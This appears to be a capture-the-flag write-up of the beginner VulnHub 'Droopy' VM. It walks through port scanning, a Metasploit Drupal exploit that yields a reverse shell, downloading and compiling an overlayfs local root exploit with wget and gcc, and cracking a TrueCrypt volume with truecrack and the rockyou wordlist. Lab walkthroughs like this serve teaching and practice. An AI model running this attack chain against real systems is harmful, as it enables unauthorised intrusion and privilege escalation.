CTF challenge @ vulnhub.com
Welcome to Droopy. This is a beginner’s boot2root/CTF VM.
The VM is set to grab a DHCP lease on boot.
There’s 2 hints I would offer you:
1.) Grab a copy of the rockyou wordlist.
2.) It’s fun to read other people’s email.
It’s a beginner’s boot2root. So let’s see how fast I can get the final flag with this CTF.
Like always let’s find out what ports are open for business.
nmap -A -sV -T4 -p- 192.168.56.102
Port 80 is open and a quick look shows that there’s a list available with directories at robots.txt.
The site runs on Drupal a Content Management System (CMS).
Let’s scan the site with ‘droopescan’. This program isn’t standard in Kali and if you want to install it apt-get install droopescan won’t do. Instead use pip install droopescan.
After checking exploit-db I saw that there were a lot of exploits to use. I know there are a lot of good working exploits that I can run myself with a python script, that will grant me administrator access. But I also know that I have to manually change the settings that way, so I can run a PHP script (my favorite is the one from pentestmonkey) and let the script run by visiting the page. That’s why I choose to use an exploit that is offered in Metasploit (drupageddon) and get a reverse shell the easy way (time’s a wasting :)).
set RHOST 192.168.56.2
set LHOST 192.168.56.102
And I’m in. Time for a proper shell and to see what the machine is running on.
python -c ‘import pty;pty.spawn(“/bin/bash”)’
www-data@droopy:/etc$ cat /etc/*-release
DISTRIB_DESCRIPTION=”Ubuntu 14.04.1 LTS”
VERSION=”14.04.1 LTS, Trusty Tahr”
PRETTY_NAME=”Ubuntu 14.04.1 LTS”
It seems the machine runs on Ubuntu 14.04. I know this version has an exploit in the overlayfs file system. But to use this exploit I need the use of gcc and wget. It seems after a quick check both are at my disposal. I copied the script for the ‘overlayfs’ Local Root Exploit (https://www.exploit-db.com/exploits/39166/) and now it’s time to get it over to the other machine.
–2016-08-01 23:52:16– http://192.168.56.102/overlayfs.c
Connecting to 192.168.56.102:80… connected.
HTTP request sent, awaiting response… 200 OK
Length: 4968 (4.9K) [text/x-csrc]
Saving to: ‘overlayfs.c’
100%[======================================>] 4,968 –.-K/s in 0s
2016-08-01 23:52:17 (198 MB/s) – ‘overlayfs.c’ saved [4968/4968]
www-data@droopy:/tmp$ gcc overlayfs.c -o overlayfs
gcc overlayfs.c -o overlayfs
www-data@droopy:/tmp$ chmod 777 overlayfs
chmod 777 overlayfs
child threads done
creating shared library
After looking round in the system I noticed that there was no flag.txt in the root directory, but a truecrypt file named dave. Like the hint said, you need the rockyou wordlist.
Time to get cracking. I downloaded the truecrypt file with meterpreter to my machine for faster cracking attempt.
truecrack -t dave.tc -w /usr/share/wordlists/rockyou.txt
This is gonna take some time. So in the meantime I’m going to further explore the system to see what can be found.
Looks like there is just one user ‘gsuser’. Nothing really in the home directory. I found a mail in /var/www-mail.
I already found the encrypted file and truecrack is running as we speak. But there are some things in this mail that can possibly speed up truecrack. There is a mention about an academy and a song from The Jam. Let’s start with academy fist.
grep -i “*.academy.*” rockyou.txt > newlist.txt
got a smaller list with only 240 words. Let’s try it with truecrack. Because I don’t know which hashtype was used, I start with the standard option ripemd160, then sha512 and finally whirlpool.
truecrack -t dave.tc -w newlist.txt -k ripemd160
truecrack -t dave.tc -w newlist.txt -k sha512
Mounting and exploring
Nice. Now it’s time to mount the file and check what’s inside?
For mounting the truecrypt file I’ll be using Veracrypt.
The final flag
Looks there is the flag inside a hidden directory.
Alright. Nice challenge from which I’ve learned a few new tricks.
Timer stopped at 4 hours. Mostly thanks to the truecrypt file.